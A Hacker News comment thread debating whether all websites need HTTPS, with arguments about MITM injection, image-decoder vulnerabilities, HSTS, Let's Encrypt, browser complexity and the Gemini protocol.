I agree. HTTPS is great, at definitely needed for a lot of things. But I don't need my cat pictures encrypted, I don't need lots of things encrypted, and frankly, I don't want it to be encrypted when it's not required, it's a waste of resources, both processing and network.

Then there is the case of all the old computers that either lack the processing power or support for modern algorithms.

If a page doesn't use HTTPS, even if it is cats, you cannot trust that the traffic has not been modified in transit. You try to load a cat but a network attacker can add malware or mining code or a worse exploit.

Every page needs HTTPS because you can't trust any content sent to you over HTTP. You don't know if it's "just a cat picture."

Only routing owners can modify the cat picture, do you think they can afford to when the browser does not "run" the cat picture?

Image decoders occasionally have RCE vulnerabilities.

I think the solution in this case is to not execute code in pictures rather than removing HTTP?

Also I'm starting to suspect the downvoting feature is used a sadistic tool, just keeping karma up so you can punish people.

They don't intentionally execute any code, they do sometimes have a vulnerability that allows memory corruption in a way that can be exploited to run attacker-provided code.

If you're not familiar with this omnipresent class of exploit, I wouldn't hope for many people on HN to take your advice on whether a security measure is needed or not seriously. Even if your comments were underlined and flashing on the page instead of grayed out.

I'd be more receptive to this if ISPs weren't snooping on traffic and selling their customer's browsing history. As long as we have to operate under the assumption that every scrap of data we send or request will be picked apart and used against us whenever possible I'd rather encrypt everything and have a little less to worry about.

Perhaps you should get some better laws in your country to prevent this, instead of ruining the web for the rest of the world?

Sorry to burst your bubble, but intelligence agencies are going to be monitoring your traffic regardless. The Internet is a global network; laws in specific countries or economic zones don't affect data in transit through other parts of the world.

When there's executable code there needs to be encryption.

JS HTML CSS WASM etc ...all need to be tamper-resistant.

Processing power, meh. More of an issue is older devices not getting the updates to software for the newer algorithms, and not getting the updated certificates. I got rid of a perfectly good tablet for just this reason. A bit slow perhaps but workable.

You don't need your cat pictures encrypted per se, but you do want to ensure that your Webportal cannot MITM your communications with catpictures.com and inject malicious javascript into the webpage.

In an adversarial situation, you also want your opponent to spend time and resources storing or cracking gigabytes of cat pictures for every kilobyte of email they get.

Here is the thing. If you enter domain.com into the address bar of your browser, your browser will always go to the http site unless you do HSTS preloading. Your first visit to a website is not secured by https. So lots of people do a http -> https redirect, which means you can do a man in the middle attack on the http port and the HSTS header will never get loaded in the first place. https is significantly less effective than it should be.

> I don't need my cat pictures encrypted

Because all images are of cats or it's easy to tell when it's sensitive and when not.

Using https is making the web a monoculture?

It obviously is. Having just an HTML site now becomes more expensive for no clear reason. Which makes more sense for people to check out Gemini.

What makes it more expensive? A certificate is free (With LE or self-signed), the performance impact is negligible and there's a clear reason for why everyone should be using it.

It does add a "tax" of sort in the form time or attention that must be paid to keep a website up. You can't just sling some files in a directory and be done -- you have to pay for certificates or pay (in time and executable capability) to keep LetsEncrypt up to date.

And, as wonderful as LetsEncrypt is, it's not forever. At some point, they're gonna' get tired of messing with it or it will get taken over by private equity (see .org) and for whatever reason, it won't work any more.

And sure, that's always been true, new stuff obsoletes old and things fall by the wayside. But my current browser can access modern websites as well as sites from the dawn of the Web. But FireFox 85, 87 or 90 will probably make https mandatory -- and that amazing continuity is gone.

There are good reasons to insist on the use of HTTPS for all sites on the public web, with no exceptions or excuses. This topic has cropped up before:

• https://news.ycombinator.com/item?id=21912817

• https://news.ycombinator.com/item?id=24640183

• https://news.ycombinator.com/item?id=22147858

These links list literally SOME and not ALL cases that need encryption.

I'm afraid I don't see your point here, please elaborate.

Your point is "this should be applied to ALL sites", while your argument for it is "because it is relevant for SOME sites".

Not so. In the top link, points 2, 3, and 5, apply to all public websites.

You cannot say that certificates are reliably free (especially in the long run), if there's only one entity providing them and that entity is dependent on corporate sponsors.

Tons of major websites rely on Let's Encrypt, so I think it's fair to say that they're probably not going anywhere soon. Free certificates are now standard on services like Cloudflare and Google App Engine. I think that AWS can generate free ones too.

We can't say that a true statement is true just because there's a chance that at some point it becomes false?

By that logic Lehman Brothers stock was a great investment on the 14 September 2008.

Not everyone needs HTTPS, in spite of what the HN mantra says.

Some websites are the equivalents of billboards.

The cost is dependence on a central authority that can make your site inaccessible in a whim.

You're aware that Gemini mandates a recent version of TLS in the protocol specification, right?

Self-signed certificates are first class citizens. Section 4.2 of the spec.

It's part of the culture of making everything web terribly complicated, which has resulted in the death of all but three web browsers.

It's now practically impossible to write a new web browser from scratch, unless you're a mega corp with endless resources and a grudge against Google, and they're still adding more complexity every day.

The web started out as a very optimistic project with no security and a lot based on trust. As it evolved a lot of security had to be bolted on which now makes it a bit more complicated than in the early days. But what's the alternative?

Of course a perfect protocol where nothing needs to be added later would be great, but that's not very realistic.

The problem isn't just HTTPS, it's the ever-expanding array of various APIs and technologies that "must" be implemented to be a "real" or "complete" browser. Even Firefox, that's been around for a long time and has a fairly large mind share, is at best an afterthought in many web projects.

The amount of APIs that need to be implemented to be considered even a basic web browser is so huge that it's not an approachable project for just about any organization, and as an individual it's just not possible.

Supporting TLS is a cakewalk compared to handling modern HTML/JS/etc. This has nothing to do with the browser monoculture.

Gemini is a monoculture. They almost say it in the FAQ:

> 2.5 Why not just use a subset of HTTP and HTML?

> [...] The problem is that deciding upon a strictly limited subset of HTTP and HTML, slapping a label on it and calling it a day would do almost nothing to create a clearly demarcated space where people can go to consume only that kind of content in only that kind of way. [...]

The protocol itself has very strong opinions on what is allowed and what is not. It is simple but mandates TLS (so, not simple), because authors think encryption is important but other things are not. It is also deliberately non-extensible.

Not saying it is a bad thing, I mean, they didn't hurt anyone. But that protocol is clearly intended as a rallying point for like-minded individuals rather than something for everyone to use.